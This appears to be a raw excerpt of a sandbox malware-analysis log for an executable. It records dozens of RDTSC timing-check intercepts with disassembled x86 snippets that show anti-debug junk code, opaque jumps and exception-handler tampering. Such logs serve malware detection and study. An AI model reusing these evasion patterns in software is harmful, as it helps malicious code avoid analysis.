                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C9B5BD second address: C9B5C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C9B5C3 second address: C9B61A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D90Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F612923D90Bh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F612923D917h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F612923D914h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C9B61A second address: C9B61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: CA0FE1 second address: CA0FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: CA0FE6 second address: CA0FEB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: CA0FEB second address: CA0FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: CA157A second address: CA158F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F61286B7176h 0x00000008 jbe 00007F61286B7176h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: CA158F second address: CA1595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: CA1595 second address: CA15B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F61286B7186h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: CA15B4 second address: CA15B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: CA365A second address: CA3673 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7185h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: CA3673 second address: CA3679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: CA3679 second address: CA369B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 099049B6h 0x0000000f push EFDDBB65h 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007F61286B717Ch 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: CA369B second address: CA36A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: CA36A1 second address: CA36A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA3BD6 second address: CA3BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D90Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA3BE6 second address: CA3BF4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA3BF4 second address: CA3BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA3CC4 second address: CA3CCA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA42BA second address: CA42C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F612923D906h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA4921 second address: CA4925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA4925 second address: CA492B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA5EC4 second address: CA5ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA5ED0 second address: CA5ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA5ED6 second address: CA5EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA5EDA second address: CA5EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F612923D90Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA655A second address: CA65B0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D1970h], ebx 0x00000010 mov esi, ecx 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+12457AB9h], edx 0x0000001a mov dword ptr [ebp+122D18B2h], edx 0x00000020 push 00000000h 0x00000022 mov edi, dword ptr [ebp+122D2A97h] 0x00000028 jnp 00007F61286B717Ch 0x0000002e xchg eax, ebx 0x0000002f ja 00007F61286B7188h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d popad 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA7E5F second address: CA7E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D90Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA88FE second address: CA895F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F61286B717Bh 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F61286B7178h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D1844h], ecx 0x00000030 push 00000000h 0x00000032 call 00007F61286B7180h 0x00000037 pop esi 0x00000038 push 00000000h 0x0000003a mov edi, esi 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F61286B717Eh 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA8664 second address: CA8671 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F612923D906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA950D second address: CA951F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F61286B7196h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAB5FE second address: CAB602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CACFE3 second address: CACFEE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F61286B7176h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAEDAF second address: CAEDB9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F612923D906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CABD6F second address: CABD74 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAF3E2 second address: CAF42D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F612923D915h 0x00000011 popad 0x00000012 popad 0x00000013 push 00000000h 0x00000015 mov bx, 68B5h 0x00000019 push 00000000h 0x0000001b movsx ebx, bx 0x0000001e xchg eax, esi 0x0000001f push eax 0x00000020 push edx 0x00000021 jng 00007F612923D91Ah 0x00000027 jmp 00007F612923D914h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAF627 second address: CAF62B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAF62B second address: CAF635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB25F2 second address: CB25F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAF635 second address: CAF639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAF639 second address: CAF64A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F61286B7176h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAF64A second address: CAF64E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB2DA7 second address: CB2E27 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F61286B7176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c adc edi, 5A724A82h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov dword ptr [ebp+122D23E9h], edi 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 sbb edi, 0FA81620h 0x0000002c mov eax, dword ptr [ebp+122D14E1h] 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F61286B7178h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000018h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c mov ebx, dword ptr [ebp+122D2B97h] 0x00000052 push FFFFFFFFh 0x00000054 adc ebx, 4A8D6C08h 0x0000005a nop 0x0000005b jmp 00007F61286B717Ah 0x00000060 push eax 0x00000061 pushad 0x00000062 pushad 0x00000063 jmp 00007F61286B717Bh 0x00000068 push edi 0x00000069 pop edi 0x0000006a popad 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB2E27 second address: CB2E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB5A66 second address: CB5A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB4D0E second address: CB4D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB5A6A second address: CB5A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB4D13 second address: CB4D18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB6A08 second address: CB6A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB6A0C second address: CB6AAC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F612923D906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F612923D908h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 jmp 00007F612923D90Eh 0x0000002d jno 00007F612923D912h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F612923D908h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f or bx, B65Eh 0x00000054 mov ebx, dword ptr [ebp+122D18C3h] 0x0000005a xor dword ptr [ebp+1245D0EFh], ebx 0x00000060 push 00000000h 0x00000062 mov bx, C700h 0x00000066 xchg eax, esi 0x00000067 pushad 0x00000068 pushad 0x00000069 push ebx 0x0000006a pop ebx 0x0000006b jmp 00007F612923D917h 0x00000070 popad 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB6C49 second address: CB6D0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7187h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F61286B7187h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F61286B7178h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a jc 00007F61286B717Ch 0x00000030 sub dword ptr [ebp+122D3169h], ebx 0x00000036 push dword ptr fs:[00000000h] 0x0000003d jmp 00007F61286B717Eh 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 add dword ptr [ebp+124576F6h], edi 0x0000004f mov eax, dword ptr [ebp+122D0E51h] 0x00000055 call 00007F61286B717Ch 0x0000005a cmc 0x0000005b pop ebx 0x0000005c mov dword ptr [ebp+122D3430h], eax 0x00000062 push FFFFFFFFh 0x00000064 push 00000000h 0x00000066 push esi 0x00000067 call 00007F61286B7178h 0x0000006c pop esi 0x0000006d mov dword ptr [esp+04h], esi 0x00000071 add dword ptr [esp+04h], 00000018h 0x00000079 inc esi 0x0000007a push esi 0x0000007b ret 0x0000007c pop esi 0x0000007d ret 0x0000007e mov bx, si 0x00000081 push eax 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 push eax 0x00000087 pop eax 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB6D0F second address: CB6D19 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F612923D906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB9CB1 second address: CB9CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB9CB5 second address: CB9CC0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CBBC6F second address: CBBC8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F61286B717Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CBBC8A second address: CBBC90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C69CAD second address: C69CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C69CB1 second address: C69CD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F612923D915h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F612923D90Eh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB8E6C second address: CB8E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB8E70 second address: CB8E7A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F612923D906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CBF12C second address: CBF145 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F61286B7183h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CBF145 second address: CBF14C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CBF14C second address: CBF155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CBF835 second address: CBF83E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CBF952 second address: CBF95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F61286B7176h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC0924 second address: CC0928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC0928 second address: CC092E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC293C second address: CC2942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC2942 second address: CC2985 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F61286B7176h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 xor dword ptr [ebp+12477C73h], esi 0x00000017 push esi 0x00000018 jo 00007F61286B717Ch 0x0000001e sub edi, 51A65325h 0x00000024 pop ebx 0x00000025 push 00000000h 0x00000027 mov ebx, 699B3AD2h 0x0000002c push 00000000h 0x0000002e and ebx, 45F0E80Dh 0x00000034 push eax 0x00000035 jo 00007F61286B7188h 0x0000003b push eax 0x0000003c push edx 0x0000003d jns 00007F61286B7176h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC2985 second address: CC2989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC2B47 second address: CC2B6C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F61286B7176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F61286B717Bh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007F61286B7178h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCA5B3 second address: CCA601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F612923D912h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F612923D910h 0x00000010 jng 00007F612923D91Eh 0x00000016 jnp 00007F612923D906h 0x0000001c jmp 00007F612923D912h 0x00000021 jl 00007F612923D912h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCA601 second address: CCA607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCA607 second address: CCA612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC9CF7 second address: CC9D19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Bh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F61286B7181h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC9FA9 second address: CC9FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC9FAF second address: CC9FB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCA13C second address: CCA147 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F612923D906h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCA147 second address: CCA175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F61286B7176h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F61286B7176h 0x00000017 jmp 00007F61286B7187h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCA175 second address: CCA185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F612923D90Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCA185 second address: CCA191 instructions: 0x00000000 rdtsc 0x00000002 js 00007F61286B717Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
